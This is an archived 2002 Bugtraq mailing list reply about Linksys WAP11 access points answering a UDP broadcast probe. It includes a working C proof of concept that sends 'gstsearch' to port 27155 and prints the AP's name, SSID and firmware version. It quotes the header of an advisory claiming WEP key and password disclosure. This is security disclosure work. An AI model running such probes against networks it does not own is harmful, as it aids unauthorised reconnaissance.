Bugtraq mailing list archives
Re: Accesspoints disclose wep keys, password and mac filter (fwd)
From: Thomas Sarlandie <sarfata () altern org>
Date: Tue, 05 Nov 2002 15:24:07 +0100
Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only returns the AP's name, SSID and firmware version. Except for the firmware version, this is not private information.
Quickly patched proof of concept:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/socket.h>

/* Layout of the answer the AP sends back to the probe. */
typedef struct {
    char type[28];
    char blank1[8];
    char apname[32];
    char firmware[6];
    char blank2[11];
    char ssid[32];
} __attribute__ ((packed)) answer;

int main()
{
    char rcvbuffer[1024];
    struct sockaddr_in sin;
    answer* ans = (answer *)rcvbuffer;
    int sd, ret, val;

    /* Zero both buffers so a short answer prints as empty fields. */
    memset(&sin, 0, sizeof(sin));
    memset(rcvbuffer, 0, sizeof(rcvbuffer));

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("255.255.255.255");
    sin.sin_port = htons(27155);

    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd < 0) {
        perror("socket");
        exit(1);
    }

    /* Broadcasting needs SO_BROADCAST on the socket. */
    val = 1;
    ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
    if (ret < 0) {
        perror("setsockopt");
        exit(1);
    }

    ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (ret < 0) {
        perror("sendto");
        exit(1);
    }

    ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
    if (ret > 0) {
        /* Fields are fixed width and may lack a NUL: bound each print. */
        printf("Type : %.*s\n", (int)sizeof(ans->type), ans->type);
        printf("Announced Name : %.*s\n", (int)sizeof(ans->apname), ans->apname);
        printf("Firmware version : %.*s\n", (int)sizeof(ans->firmware), ans->firmware);
        printf("SSID : %.*s\n", (int)sizeof(ans->ssid), ans->ssid);
    } else
        perror("read");

    return 0;
}

thomas
KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
Accesspoints disclose wep keys, password and mac filter

Date
----
2002-11-01